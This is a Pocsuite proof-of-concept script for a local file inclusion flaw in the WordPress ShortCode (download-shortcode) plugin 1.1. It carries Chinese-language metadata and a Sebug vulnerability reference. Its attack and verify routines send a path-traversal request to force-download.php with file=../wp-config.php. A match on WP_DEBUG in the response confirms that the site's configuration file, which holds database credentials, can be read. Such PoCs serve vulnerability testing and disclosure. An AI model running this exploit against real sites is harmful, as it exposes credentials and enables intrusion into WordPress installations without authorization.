WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability

                                                #!/usr/bin/env python
# -*- coding:utf-8 -*-



from pocsuite.net import req

from pocsuite.poc import Output, POCBase

from pocsuite.utils import register



class TestPOC(POCBase):

    vulID = '87214'

    version = '1'

    vulDate = '1409760000'

    createDate = '1442937600'

    references = ['http://www.sebug.net/vuldb/ssvid-87214']

    name = 'WordPress ShortCode Plugin Local File Inclusion Vulnerability '

    appPowerLink = '# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip'

    appName = 'WordPress ShortCode Plugin'

    appVersion = '1.1'

    vulType = 'Local File Inclusion'

    desc = '''WordPress ShortCode Plugin插件在处理传入的参数时存在缺陷，导致产生本地文件包含漏洞。'''

    samples = ['']



    def _attack(self):

        return self._verify()



    def _verify(self, verify=True):

        result = {}

        vul_url = '%s/wp-content/force-download.php?file=../wp-config.php' % self.url

        response = req.get(vul_url, timeout=10).content



        if 'define(\'WP_DEBUG\'' in response:

            result['VerifyInfo'] = {}

            result['VerifyInfo']['URL'] = self.url



        return self.parse_attack(result)



    def parse_attack(self, result):

        output = Output(self)



        if result:

            output.success(result)

        else:

            output.fail('failed')



        return output

register(TestPOC)